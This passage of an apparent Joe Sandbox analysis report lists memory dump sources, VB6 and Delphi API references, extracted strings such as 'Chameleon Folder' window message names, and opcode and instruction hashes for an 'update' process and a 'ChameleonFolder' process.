                                                                                                            • __vbaFreeStr.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CAB2
                                                                                                            • __vbaFreeStr.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CABA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2170437571.0000000000473000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2170325166.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2170437571.0000000000401000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2170437571.0000000000405000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2171316457.000000000047E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2171558209.000000000047F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __vba$Free$Move$#517#519#521#589#632ChkstkCopy
                                                                                                            • String ID: J$P
                                                                                                            • API String ID: 2969115251-416244054
                                                                                                            • Opcode ID: 84ad5bbd3b495c695e980ff16cb899cdf92980267397cfa03ee8d65a1c30e817
                                                                                                            • Instruction ID: 600c41930edbf5345b53f6e0ada458424355e7629755e05f7768d33b8ea98004
                                                                                                            • Opcode Fuzzy Hash: 84ad5bbd3b495c695e980ff16cb899cdf92980267397cfa03ee8d65a1c30e817
                                                                                                            • Instruction Fuzzy Hash: 2D31E871900109AADB14EBE1CD92ADDB7B5BF14708F5081BEF106B61F2DF785A09CB58
                                                                                                            APIs
                                                                                                            • __vbaChkstk.MSVBVM60(?,004011C6), ref: 0047CAF0
                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004011C6), ref: 0047CB20
                                                                                                            • __vbaI2Var.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0047CB44
                                                                                                            • __vbaErrorOverflow.MSVBVM60(000000FF,?,?,?,?,004011C6), ref: 0047CB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2170437571.0000000000473000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2170325166.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2170437571.0000000000401000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2170437571.0000000000405000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2171316457.000000000047E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2171558209.000000000047F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __vba$Error$ChkstkOverflow
                                                                                                            • String ID:
                                                                                                            • API String ID: 4034433386-0
                                                                                                            • Opcode ID: 30cf5124134122de6dc8dfba6cd1d5d8f3c8a7a4a56734bc557e0a2ac1cf7d7f
                                                                                                            • Instruction ID: 7394c3622a3f878416dc302d39e75d64018f9e8212293217472152b5f63ef166
                                                                                                            • Opcode Fuzzy Hash: 30cf5124134122de6dc8dfba6cd1d5d8f3c8a7a4a56734bc557e0a2ac1cf7d7f
                                                                                                            • Instruction Fuzzy Hash: CE014C75C01248ABDB00EFD9C9497CDBBF8EB08B14F10866EE110B7290D3BD5A448BA9
                                                                                                            Strings
                                                                                                            • WM_HOOK_LOG by Chameleon Folder, xrefs: 034E6F5B
                                                                                                            • WM_SET_FOREGROUND by Chameleon Folder, xrefs: 034E6ECF
                                                                                                            • WM_PATH_DIALOG_GET by Chameleon Folder, xrefs: 034E6EEB
                                                                                                            • Folder.dll, xrefs: 034E6F93
                                                                                                            • WM_PATH_DIALOG_SET by Chameleon Folder, xrefs: 034E6F07
                                                                                                            • 0, xrefs: 034E6E49
                                                                                                            • WM_PATH_BROWSE_SET by Chameleon Folder, xrefs: 034E6F23
                                                                                                            • WM_DIALOG_YPS by Chameleon Folder, xrefs: 034E6F3F
                                                                                                            • WM_HOOK_WINDOW by Chameleon Folder, xrefs: 034E6F77
                                                                                                            • ChameleonFolderHelper, xrefs: 034E6E3F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0$ChameleonFolderHelper$Folder.dll$WM_DIALOG_YPS by Chameleon Folder$WM_HOOK_LOG by Chameleon Folder$WM_HOOK_WINDOW by Chameleon Folder$WM_PATH_BROWSE_SET by Chameleon Folder$WM_PATH_DIALOG_GET by Chameleon Folder$WM_PATH_DIALOG_SET by Chameleon Folder$WM_SET_FOREGROUND by Chameleon Folder
                                                                                                            • API String ID: 0-665509755
                                                                                                            • Opcode ID: 9ffa8f6840436782e90293cc4e9ef60cd837807f8c50a00da7ed89d8e997bbcd
                                                                                                            • Instruction ID: 252ac4e0efd8ef72324bf925d9923e10b0aff9fd4ffb540c1bff3a36c796326d
                                                                                                            • Opcode Fuzzy Hash: 9ffa8f6840436782e90293cc4e9ef60cd837807f8c50a00da7ed89d8e997bbcd
                                                                                                            • Instruction Fuzzy Hash: 33513775E40308AFDB04EFB5D881BAE7BE8EB19705F51442BF810EF246EB7599108B58
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                                            • API String ID: 0-3496071916
                                                                                                            • Opcode ID: 2c52150e95b41c4c6be8db06202e81faabf7c00fbc5bad30996c7e1d18b0c19e
                                                                                                            • Instruction ID: c8041b37b38fd4c990cb8d123e86ab11fe6744e0976ead8c221d58f98856410a
                                                                                                            • Opcode Fuzzy Hash: 2c52150e95b41c4c6be8db06202e81faabf7c00fbc5bad30996c7e1d18b0c19e
                                                                                                            • Instruction Fuzzy Hash: C8513579E40308BEEB11EA95CC41FAEB7BCEB18704F540567BE14EE583DA709A50CA58
                                                                                                            Strings
                                                                                                            • {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}, xrefs: 034E9BB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}
                                                                                                            • API String ID: 0-4124573863
                                                                                                            • Opcode ID: 152dfc6f52c6fe7da12b0caf8b2ecff00cc7e7619b61ff2cca34e7fca2d7fb5f
                                                                                                            • Instruction ID: 2eb725f57dcb3be7439da1e5781b93dede907360c62b91664b942bad94d634d7
                                                                                                            • Opcode Fuzzy Hash: 152dfc6f52c6fe7da12b0caf8b2ecff00cc7e7619b61ff2cca34e7fca2d7fb5f
                                                                                                            • Instruction Fuzzy Hash: 74218EB8645300AFE791FFA9D885B1577E4EB4A721F18815AF510EF3E4C774A880CB19
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5ada3c8c950941fbf2a4b36e552d33f9bfb87caf017487ddfdef70e1f6d3fac7
                                                                                                            • Instruction ID: 817d458fc4f500d5259e0e7a667e3fd483fdc3364d4f495510a0bce34aac80c8
                                                                                                            • Opcode Fuzzy Hash: 5ada3c8c950941fbf2a4b36e552d33f9bfb87caf017487ddfdef70e1f6d3fac7
                                                                                                            • Instruction Fuzzy Hash: 2E617275A04318AFDB10EFA5D89099E7BF9EB59310F5244AAF814EF250D738DA50CF18
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7748e1fdcb530c83941eb6f08f5a8c1c6ee6ea46d890112c86f3465b65b6cba1
                                                                                                            • Instruction ID: 6b1cc9e3e918e8e73febd919a935dd42a9895cfd07a52ea3d437ef66e0728a33
                                                                                                            • Opcode Fuzzy Hash: 7748e1fdcb530c83941eb6f08f5a8c1c6ee6ea46d890112c86f3465b65b6cba1
                                                                                                            • Instruction Fuzzy Hash: A65153759007448FDB20EF6AC48875ABBE4EB09314F1945AFFC099F34ACB799884CB19
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7290b42011e70f839895acb9a42d1f97ee8b3bd314baf1a9f47484e75fe7c762
                                                                                                            • Instruction ID: 686ff756a9d26af4fad3e1a7b16bebd40a5e31c91f58953fffdddf0c1fe4f983
                                                                                                            • Opcode Fuzzy Hash: 7290b42011e70f839895acb9a42d1f97ee8b3bd314baf1a9f47484e75fe7c762
                                                                                                            • Instruction Fuzzy Hash: DD312F74E002199FDB11EF99C880BAEB7B5EB44300F54466BF800AF352DB749D85CB59
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7e1004d4178015379abbe27c54554ebae7982e49185e3609e2138eeebf119bdd
                                                                                                            • Instruction ID: 9d2c7a405e310617da21adbb6a824cbe05089c30c549954b25283bf95d5ab53a
                                                                                                            • Opcode Fuzzy Hash: 7e1004d4178015379abbe27c54554ebae7982e49185e3609e2138eeebf119bdd
                                                                                                            • Instruction Fuzzy Hash: 4D117534E002089FDB51EF69C8D095DBBF9EB48600B5441BBFC15DF352DB709D458A18
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2e10703e078a8075ac38df315f854a2d47addf897ec49a34f66674d257e916ac
                                                                                                            • Instruction ID: 8f10ba7861005a839ee66e8d8679ba4f1911e4b225fb1a502ee3c96631607ea9
                                                                                                            • Opcode Fuzzy Hash: 2e10703e078a8075ac38df315f854a2d47addf897ec49a34f66674d257e916ac
                                                                                                            • Instruction Fuzzy Hash: 6C118178E003099FDF45EF95C881AAEB7B8EF45300F50417ABD05AF252DB705E04D629
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c95e2b90a9ce0ee879b172b0913182987224919b0cae40f4e19bd19b20767289
                                                                                                            • Instruction ID: 740c2d7f394243852c3a59a290dc0b66d37dcfb6220daa7b5c5c30962dedd565
                                                                                                            • Opcode Fuzzy Hash: c95e2b90a9ce0ee879b172b0913182987224919b0cae40f4e19bd19b20767289
                                                                                                            • Instruction Fuzzy Hash: 1F113D35E4431C9FDB15EB54C885BDDB7B8EB04700F5141BAF908AE292DA749E84CE68
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1ad15d8decf3f3d50a7ea5df568876ac2597eb6e51ee3a3232ac7f643054aaf6
                                                                                                            • Instruction ID: fc388227c66e1b985f59c53ef67b376f80631ccde26c1a4417b1c67be61d33a5
                                                                                                            • Opcode Fuzzy Hash: 1ad15d8decf3f3d50a7ea5df568876ac2597eb6e51ee3a3232ac7f643054aaf6
                                                                                                            • Instruction Fuzzy Hash: 67110A74A40308AFDB50EEA4D881F6A73E9EB19701F08415AA904EF395D778E950CBA9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9cc376453ec3ed48dbca040bb652fa479c39dba5b26913345deec295b0b3da69
                                                                                                            • Instruction ID: 1fae89679d189c3a8376b10c3a796ffc6d525fb16e95dc7f860db75b998eed1d
                                                                                                            • Opcode Fuzzy Hash: 9cc376453ec3ed48dbca040bb652fa479c39dba5b26913345deec295b0b3da69
                                                                                                            • Instruction Fuzzy Hash: 8D1140B9A00208EFCB40DF9CD880E9A77ECEB4D250B048545F918DF354C334ED509B64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 01fab52cbb4d33ed30ad8ebd7c3111c679ae1de4cb386cb4197d0c5357cc27f8
                                                                                                            • Instruction ID: a981751f89571d9152194317ab89e6f8e43f8f8c7bba00724aa1bb389aad5a84
                                                                                                            • Opcode Fuzzy Hash: 01fab52cbb4d33ed30ad8ebd7c3111c679ae1de4cb386cb4197d0c5357cc27f8
                                                                                                            • Instruction Fuzzy Hash: 28F074B6704218BF9B44DE9DDC80D9F77ECEB4D2A0B054169FA08E7201D634ED108BA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 993b40372ded986758e10d910bcff418d912927c9da50b718accd923f3091136
                                                                                                            • Instruction ID: 864cca407eec0c16147434cb3b9d78fed279ebb90fae6d91cada009881d593b7
                                                                                                            • Opcode Fuzzy Hash: 993b40372ded986758e10d910bcff418d912927c9da50b718accd923f3091136
                                                                                                            • Instruction Fuzzy Hash: 41F097B6604218BF8B44DE9DDC80DDF77ECEB4D2A0B054169FA0CE7201D634ED108BA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c1bfd5af6f1c20c013507f5e70936e5cee221262d5e18fcdfdee3ca79912f187
                                                                                                            • Instruction ID: fa8328a381caa59181625da556a0e438b499d23a891785e593edbfdbcb158d37
                                                                                                            • Opcode Fuzzy Hash: c1bfd5af6f1c20c013507f5e70936e5cee221262d5e18fcdfdee3ca79912f187
                                                                                                            • Instruction Fuzzy Hash: BEF0C232E466149FE722CF59E88091BFBEAE7497207AB007BFD049F715D639AC10C658
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f7619374904b66fe3f0530e02acf8620edc3f037196ef0c29c181c7890db4cb5
                                                                                                            • Instruction ID: ea7f5560dcb7bd770c8ed530ec1e60863279f9da3ebc157cf8940e87e1282568
                                                                                                            • Opcode Fuzzy Hash: f7619374904b66fe3f0530e02acf8620edc3f037196ef0c29c181c7890db4cb5
                                                                                                            • Instruction Fuzzy Hash: 99F069B2E043004FD714EE79AA41342BAD4E745750B18423EE909EF788EB7088518788
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8a980844a63081f6cdd72f441cb1b353cb5817a149009b44212975d7bce5a27f
                                                                                                            • Instruction ID: 2439363da81c3de1f791239ffa459507641ea3b9bae4110b849824a9b9cad830
                                                                                                            • Opcode Fuzzy Hash: 8a980844a63081f6cdd72f441cb1b353cb5817a149009b44212975d7bce5a27f
                                                                                                            • Instruction Fuzzy Hash: E0F0A47CB047445FD602FFBB58141193BD8EB85608749486BE9049E646DB29C810C72F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5fa1ab01ef676c92f327af40291131ee62fe5b630eb86be1af1436f8d5b1d89f
                                                                                                            • Instruction ID: 18b6dd358f2a637c3c7973af85376a34679b0f7f488f1eb71370df27ae826717
                                                                                                            • Opcode Fuzzy Hash: 5fa1ab01ef676c92f327af40291131ee62fe5b630eb86be1af1436f8d5b1d89f
                                                                                                            • Instruction Fuzzy Hash: 1DF0FF38E043099FDF45EBA5D5806AD77B4AF41200F5041BBAC45AF253DA349E09D729
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2926997777.0000000000589000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00589000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_589000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4febe0eb4d84dd83019475e959ff80df768adc17356b2f847f0a26c6c8f5c2da
                                                                                                            • Instruction ID: 3cd3905165a61f5e59cbd3627ab8ae1ec89f996e675b9aa447411af0897815f2
                                                                                                            • Opcode Fuzzy Hash: 4febe0eb4d84dd83019475e959ff80df768adc17356b2f847f0a26c6c8f5c2da
                                                                                                            • Instruction Fuzzy Hash: 19F055223043A4A7DB11AAAE6C4097EBBDCAB823607088127BC44C7302C939CE02C6A4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ce1a405191a695b7444796ad9d917ebf4ce0b35ac844588704a76b86cff719cd
                                                                                                            • Instruction ID: 15e9428af979344e8b3119b0eb608a2d762cb5a8324c5a572061c4e35d598a05
                                                                                                            • Opcode Fuzzy Hash: ce1a405191a695b7444796ad9d917ebf4ce0b35ac844588704a76b86cff719cd
                                                                                                            • Instruction Fuzzy Hash: 19F0BE39D00708AECB51EF69CC4195EBBBCEB456107A406B6BC14DB642E6349F00991C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2926997777.0000000000589000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00589000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_589000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f52bc3c0e91d2b20c49cc3c2efc9167d6dab231f5c988c19ea67b3c5103d18ef
                                                                                                            • Instruction ID: 27ed2c645dccc415537787f1760b60616f35f9b11116cc2e6520bbea6ad492ff
                                                                                                            • Opcode Fuzzy Hash: f52bc3c0e91d2b20c49cc3c2efc9167d6dab231f5c988c19ea67b3c5103d18ef
                                                                                                            • Instruction Fuzzy Hash: 7DF055222043A4A7CB11AAAE6C4096EBBDCAB823607088127BC44C7302C939CE02C6A4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8fd07f7aa631413c2878be62729b4113edf8af83b34d8c96071a2e62b9ca8f68
                                                                                                            • Instruction ID: c8c39eb43569405b27d5893460694abc5e4c7cfa6d1e4f6754daa15887c9cb8b
                                                                                                            • Opcode Fuzzy Hash: 8fd07f7aa631413c2878be62729b4113edf8af83b34d8c96071a2e62b9ca8f68
                                                                                                            • Instruction Fuzzy Hash: B7F0E234A00704AFD702EA5ADC41A1D7BE8D74A711FA14576FC00DF212D6745E118558
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3fa9d78bf1d1d9bcf32d207f293726de594c7b481e3e9540a8b4e3ecdafb39e2
                                                                                                            • Instruction ID: f2b23748affc9d81fb84e278043987bc12f87f228bd19310e1b43b820c1dd898
                                                                                                            • Opcode Fuzzy Hash: 3fa9d78bf1d1d9bcf32d207f293726de594c7b481e3e9540a8b4e3ecdafb39e2
                                                                                                            • Instruction Fuzzy Hash: 5BE0C9B6A003149FCB50DF68C8C4A567798AB08654F044A96BD14CF347E771D92087D5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3e73207bc2bd0ed3438404932db16be292594001eca85d32d3abe24fb02f6bd2
                                                                                                            • Instruction ID: 1d93ceed885228f63a6f4a48b4f1ce2348320a03a3940a125fa54dfdce45a94c
                                                                                                            • Opcode Fuzzy Hash: 3e73207bc2bd0ed3438404932db16be292594001eca85d32d3abe24fb02f6bd2
                                                                                                            • Instruction Fuzzy Hash: C8E04FB93053016FE714DF569880A62F7D5EF88260F148265EA848B354D231DC0186A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9e1ea3b725c7c416e11fdb703ceea72261cf72561665a8d98a8bf89397945804
                                                                                                            • Instruction ID: b4f72639582920e30fa4bd814a395dd7955dc94a7f39e2fb56210dccd866798e
                                                                                                            • Opcode Fuzzy Hash: 9e1ea3b725c7c416e11fdb703ceea72261cf72561665a8d98a8bf89397945804
                                                                                                            • Instruction Fuzzy Hash: 5ED092B5F887107EEA11F6E19C86F193294E714F16F648416F710BE2C6C7E468558B1C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2926997777.0000000000589000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00589000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_589000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4b4d7f323154e559991fb84886ae50a6ce2d6ce784a5ca9b00dcce846ff2354c
                                                                                                            • Instruction ID: a7460d77dff2dd95a8ac96394b932783a8c89b8b75b6c65392c8c15b29cb42b5
                                                                                                            • Opcode Fuzzy Hash: 4b4d7f323154e559991fb84886ae50a6ce2d6ce784a5ca9b00dcce846ff2354c
                                                                                                            • Instruction Fuzzy Hash: E7B012D240C2E815822132F70CD0C227EDC388E13234901C3B1D109063401D81006730
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cf09de931941102fa814a9c91a2eca9018a1048548d567f8e876b791c8af1e70
                                                                                                            • Instruction ID: 9bb69bf66dc1f3a6702bccfc6c7f479914c1ff35286a446f8cbd40dad5536acf
                                                                                                            • Opcode Fuzzy Hash: cf09de931941102fa814a9c91a2eca9018a1048548d567f8e876b791c8af1e70
                                                                                                            • Instruction Fuzzy Hash: C6C04C78444240CEDBDAFF95D444B147ED9E75122BF89609AD4006D195D37888A4C62A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f8cd5c5639be6c8299dc47c4658b2f268de53f7e986acf187d368744a37de2b0
                                                                                                            • Instruction ID: 8a96cd9cf068709831918fcf5fdd5fff912180976cc295ec98543a55ddde0853
                                                                                                            • Opcode Fuzzy Hash: f8cd5c5639be6c8299dc47c4658b2f268de53f7e986acf187d368744a37de2b0
